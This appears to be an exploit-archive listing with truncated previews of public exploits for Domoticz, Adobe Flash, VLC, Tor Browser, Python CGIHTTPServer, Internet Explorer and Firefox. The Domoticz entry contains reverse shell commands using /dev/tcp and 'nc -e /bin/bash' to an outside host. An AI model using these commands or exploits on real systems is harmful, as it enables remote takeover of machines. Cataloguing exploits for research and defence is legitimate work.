Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit

Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...

Adobe Flash < 28.0.0.161 - Use-After-Free

!/usr/bin/env python coding: UTF-8 import BaseHTTPServer import sys from SimpleHTTPServer import SimpleHTTPRequestHandler print "@Syfi2k" print "+ CVE-2018-4878 poc " print "--------------------------------" print "Calc.exe Shellcode via Msfvenom" print "Based on fixed version...

Adobe Flash 28.0.0.161 - Use-After-Free

Adobe Flash 28.0.0.161 - Use-After-Free !/usr/bin/env python coding: UTF-8 import BaseHTTPServer import sys from SimpleHTTPServer import SimpleHTTPRequestHandler print "@Syfi2k" print "+ CVE-2018-4878 poc " print "--------------------------------" print "Calc.exe Shellcode via Msfvenom" print...

VLC Media Player 2.2.3 DecodeAdpcmImaQ Buffer Overflow

Exploit Title: VLC Media Player 2.2.3- 'DecodeAdpcmImaQT' Buffer Overflow Author: Sultan albalawi st:http://mirror.library.ucy.ac.cy/videolan/vlc/2.2.3/win32/vlc-2.2.3-win32.exe Tested on:win10...

Tor Browser 6.0.5 remote Denial of Service Exploit

Exploit for windows platform in category dos / poc Exploit Title: Tor Browser 6.0.5 remote Denial of Service Author: Sultan Albalawi video:https://www.facebook.com/pentest3/videos/vb.100012552940568/204971129931317/?type=2&theater Tested on:win7 external ip http://extrnal-ip:6060 or torbrowser--...

VideoLAN VLC Media Player 2.2.1 - Buffer Overflow

VideoLAN VLC Media Player 2.2.1 - Buffer Overflow Exploit Title: VLC Media Player 2.2.1 Buffer Overflow 2016-09-28 Author: sultan albalawi Software Link: https://www.videolan.org/vlc/releases/2.2.1.html Tested on:win7 video...

Python CGIHTTPServer - Encoded Directory Traversal

Advisory: Python CGIHTTPServer File Disclosure and Potential Code Execution The CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. This may enable attackers to disclose a CGI script's source code or execute arbitrary CGI scripts in the server's document root...

Python CGIHTTPServer File Disclosure / Code Execution

Advisory: Python CGIHTTPServer File Disclosure and Potential Code Execution The CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. This may enable attackers to disclose a CGI script's source code or execute arbitrary CGI scripts in the server's document root...

Internet Explorer 6 Web Server Exploit

Author : Ahmed Obied [email protected] Modify by: syniack [email protected] This program acts as a web server that generates an exploit to target a vulnerability CVE-2010-0249 in Internet Explorer. The exploit was tested using Internet Explorer 6 on Windows XP SP3. The exploit's payload...

Internet Explorer Aurora Exploit

Author : Ahmed Obied [email protected] This program acts as a web server that generates an exploit to target a vulnerability CVE-2010-0249 in Internet Explorer. The exploit was tested using Internet Explorer 6 on Windows XP SP2. The exploit's payload spawns the calculator. Usage : python...

Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow

!/usr/bin/python FireFox 2.0.0.16 Windows XP SP3 x86 Remote Exploit Author: Dominic Chell Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016. As of September 2009 there are no public exploits for this vulnerability. However, according to securityfocus an exploit is available...

Mozilla Firefox 3.5 Heap Spray OS X

!/usr/bin/env python FireFox 3.5 Heap Spray OS X Exploit Modified by: DrIDE Originally Discovered by: Simon Berry-Bryne Pythonized by: David Kennedy ReL1K @ SecureState Thanks to HDM Tested on OS X 10.5.7 from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler impo...